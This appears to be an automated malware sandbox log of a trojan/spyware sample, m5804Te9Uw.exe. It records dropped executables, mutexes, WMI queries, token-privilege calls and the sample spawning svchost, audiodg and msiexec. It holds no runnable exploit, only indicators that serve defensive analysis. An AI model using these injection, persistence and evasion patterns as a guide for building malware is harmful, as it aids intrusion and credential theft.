                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CBF52016_2_00007FF821CBF520
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CC28B016_2_00007FF821CC28B0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CB885416_2_00007FF821CB8854
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CF274016_2_00007FF821CF2740
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CB26F816_2_00007FF821CB26F8
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CCDAC016_2_00007FF821CCDAC0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D22A6816_2_00007FF821D22A68
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D22C4816_2_00007FF821D22C48
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D17BFC16_2_00007FF821D17BFC
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CBFBE016_2_00007FF821CBFBE0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CB5B5C16_2_00007FF821CB5B5C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D55E6416_2_00007FF821D55E64
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CE0E1516_2_00007FF821CE0E15
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D58DF816_2_00007FF821D58DF8
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D400BC16_2_00007FF821D400BC
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CDF00016_2_00007FF821CDF000
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CBD03016_2_00007FF821CBD030
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CB2FA016_2_00007FF821CB2FA0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CBFF6016_2_00007FF821CBFF60
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B51A8016_2_00007FF838B51A80
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B5314016_2_00007FF838B53140
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B52D3016_2_00007FF838B52D30
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B51A8016_2_00007FF838B51A80
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B5521C16_2_00007FF838B5521C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B5263016_2_00007FF838B52630
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B537B016_2_00007FF838B537B0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B53CF016_2_00007FF838B53CF0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B62DD016_2_00007FF838B62DD0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B66AE416_2_00007FF838B66AE4
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B871CC16_2_00007FF838B871CC
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B8D13016_2_00007FF838B8D130
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe 94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeCode function: String function: 00007FF72A0214EC appears 106 times
                    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF7DF2214EC appears 106 times
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: String function: 00007FF79DAD2760 appears 36 times
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: String function: 00007FF79DAD25F0 appears 100 times
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: String function: 00007FF7F73E14EC appears 106 times
                    Source: C:\Windows\System32\msiexec.exeCode function: String function: 00007FF65D6F14EC appears 106 times
                    Source: C:\Windows\System32\audiodg.exeCode function: String function: 00007FF6DAB814EC appears 106 times
                    Source: api-ms-win-core-file-l2-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-localization-l1-2-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-timezone-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-namedpipe-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-util-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-stdio-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-datetime-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-locale-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-2-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-convert-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-process-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-console-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-handle-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-1.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-errorhandling-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-filesystem-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-heap-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-sysinfo-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-profile-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-memory-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-string-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-string-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-utility-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-runtime-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-time-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-interlocked-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-environment-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-conio-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processenvironment-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-libraryloader-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l1-2-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-math-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-debug-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-heap-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
                    Source: m5804Te9Uw.exeBinary or memory string: OriginalFilename vs m5804Te9Uw.exe
                    Source: m5804Te9Uw.exe, 00000003.00000003.1278778164.0000000002640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs m5804Te9Uw.exe
                    Source: m5804Te9Uw.exe, 00000003.00000003.1278950039.0000000002690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs m5804Te9Uw.exe
                    Source: m5804Te9Uw.exe, 00000003.00000000.1278130816.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs m5804Te9Uw.exe
                    Source: m5804Te9Uw.exe, 00000003.00000003.1278899067.00000000026E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs m5804Te9Uw.exe
                    Source: m5804Te9Uw.exeBinary or memory string: OriginalFilenameServices.exe2 vs m5804Te9Uw.exe
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/57@0/1
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAD29E0 GetLastError,FormatMessageW,MessageBoxW,15_2_00007FF79DAD29E0
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E40AC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,3_2_00007FF7F73E40AC
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_00007FF7DF2240AC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,4_2_00007FF7DF2240AC
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeCode function: 10_2_00007FF72A0240AC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,10_2_00007FF72A0240AC
                    Source: C:\Windows\System32\audiodg.exeCode function: 12_2_00007FF6DAB840AC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,12_2_00007FF6DAB840AC
                    Source: C:\Windows\System32\msiexec.exeCode function: 13_2_00007FF65D6F40AC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,13_2_00007FF65D6F40AC
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E3DEC CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,wcscmp,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,3_2_00007FF7F73E3DEC
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeFile created: C:\Users\user\AppData\Roaming\443320E440F81953448019Jump to behavior
                    Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
                    Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\rbNSpGEsyb
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeMutant created: NULL
                    Source: C:\Windows\System32\audiodg.exeMutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
                    Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
                    Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\GqgWzd
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2FDD.tmpJump to behavior
                    Source: m5804Te9Uw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: m5804Te9Uw.exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeFile read: C:\Users\user\Desktop\m5804Te9Uw.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\m5804Te9Uw.exe "C:\Users\user\Desktop\m5804Te9Uw.exe"
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe"
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe "C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe"
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe"
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe"
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe "C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe"
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe" Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe "C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe" Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe" Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe "C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeSection loaded: rsaenh.dllJump to behavior
